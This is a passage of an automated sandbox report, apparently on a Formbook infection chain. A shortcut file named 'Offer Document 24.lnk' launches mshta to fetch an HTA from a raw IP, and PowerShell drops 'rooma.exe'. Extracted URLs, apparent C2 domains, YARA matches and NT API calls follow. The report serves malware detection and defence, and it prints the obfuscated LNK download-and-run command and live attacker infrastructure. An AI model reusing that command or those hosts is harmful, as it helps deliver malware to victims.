          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/r
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/ro
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/roo
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/r
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/ro
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/roo
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room
          Source: mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, Offer Document 24.lnkString found in binary or memory: http://20.86.128.223/room/room4.hta
          Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta$
          Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta....=H
          Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta...H2
          Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta4.C:
          Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta8N
          Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.hta;H
          Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaC:
          Source: mshta.exe, 00000003.00000002.1489938203.00000237E1260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaFPS_BROWSER_AP
          Source: mshta.exe, 00000003.00000002.1489900922.00000237E1230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaH
          Source: mshta.exe, 00000003.00000003.1484607386.0000023FE4512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1482542643.0000023FE44E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483734633.0000023FE44FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483458080.0000023FE44F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489199159.0000023FE4514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaLMEMH
          Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaY
          Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htao
          Source: mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htastricted
          Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htat
          Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/room4.htaventindowsINetCookiesIO
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma.
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma.e
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma.ex
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma.exe
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.128.223/room/rooma.exep
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.86.1H2
          Source: svchost.exe, 00000008.00000002.3113103128.0000024A08800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.joyesi.xyz
          Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.joyesi.xyz/fo8o/
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
          Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
          Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000046E6000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003966000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://donnavariedades.com/fo8o?Plm0mn68=l
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
          Source: svchost.exe, 00000008.00000003.1476761679.0000024A08710000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000005.00000002.1443610984.0000021E63FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co9
          Source: mshta.exe, 00000003.00000002.1490295950.00000237E135A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000290C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: netbtugc.exe, 0000000A.00000003.1779391791.000000000783F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
          Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi
          Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
          Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000004A0A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003C8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR
          Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
          Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI
          Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
          Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Initial fileStrings: http://20.86.128.223/room/room4.hta
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\rooma.exeJump to dropped file
          Source: Offer Document 24.lnkLNK file: . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009DB363 NtClose,7_2_009DB363
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B1D09 NtProtectVirtualMemory,7_2_009B1D09
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D35C0 NtCreateMutant,LdrInitializeThunk,7_2_015D35C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2B60 NtClose,LdrInitializeThunk,7_2_015D2B60
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_015D2DF0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_015D2C70
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D3010 NtOpenDirectoryObject,7_2_015D3010
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D3090 NtSetValueKey,7_2_015D3090
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D4340 NtSetContextThread,7_2_015D4340
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D4650 NtSuspendThread,7_2_015D4650
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D39B0 NtGetContextThread,7_2_015D39B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2BF0 NtAllocateVirtualMemory,7_2_015D2BF0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2BE0 NtQueryValueKey,7_2_015D2BE0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2B80 NtQueryInformationFile,7_2_015D2B80
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2BA0 NtEnumerateValueKey,7_2_015D2BA0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2AD0 NtReadFile,7_2_015D2AD0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2AF0 NtWriteFile,7_2_015D2AF0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2AB0 NtWaitForSingleObject,7_2_015D2AB0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D3D70 NtOpenThread,7_2_015D3D70
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2D10 NtMapViewOfSection,7_2_015D2D10
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D3D10 NtOpenProcessToken,7_2_015D3D10
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2D00 NtSetInformationFile,7_2_015D2D00
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2D30 NtUnmapViewOfSection,7_2_015D2D30
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2DD0 NtDelayExecution,7_2_015D2DD0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2DB0 NtEnumerateKey,7_2_015D2DB0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2C60 NtCreateKey,7_2_015D2C60
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2C00 NtQueryInformationProcess,7_2_015D2C00
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2CC0 NtQueryVirtualMemory,7_2_015D2CC0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2CF0 NtOpenProcess,7_2_015D2CF0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2CA0 NtQueryInformationToken,7_2_015D2CA0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2F60 NtCreateProcessEx,7_2_015D2F60
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2F30 NtCreateSection,7_2_015D2F30
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2FE0 NtCreateFile,7_2_015D2FE0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2F90 NtProtectVirtualMemory,7_2_015D2F90
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2FB0 NtResumeThread,7_2_015D2FB0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2FA0 NtQuerySection,7_2_015D2FA0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2E30 NtWriteVirtualMemory,7_2_015D2E30
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2EE0 NtQueueApcThread,7_2_015D2EE0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2E80 NtReadVirtualMemory,7_2_015D2E80
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D2EA0 NtAdjustPrivilegesToken,7_2_015D2EA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F24340 NtSetContextThread,LdrInitializeThunk,10_2_02F24340
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F24650 NtSuspendThread,LdrInitializeThunk,10_2_02F24650
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F235C0 NtCreateMutant,LdrInitializeThunk,10_2_02F235C0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22AF0 NtWriteFile,LdrInitializeThunk,10_2_02F22AF0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22AD0 NtReadFile,LdrInitializeThunk,10_2_02F22AD0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_02F22BF0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22BE0 NtQueryValueKey,LdrInitializeThunk,10_2_02F22BE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_02F22BA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22B60 NtClose,LdrInitializeThunk,10_2_02F22B60
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F239B0 NtGetContextThread,LdrInitializeThunk,10_2_02F239B0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk,10_2_02F22EE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_02F22E80
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22FE0 NtCreateFile,LdrInitializeThunk,10_2_02F22FE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22FB0 NtResumeThread,LdrInitializeThunk,10_2_02F22FB0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22F30 NtCreateSection,LdrInitializeThunk,10_2_02F22F30
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_02F22CA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_02F22C70
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22C60 NtCreateKey,LdrInitializeThunk,10_2_02F22C60
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_02F22DF0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22DD0 NtDelayExecution,LdrInitializeThunk,10_2_02F22DD0
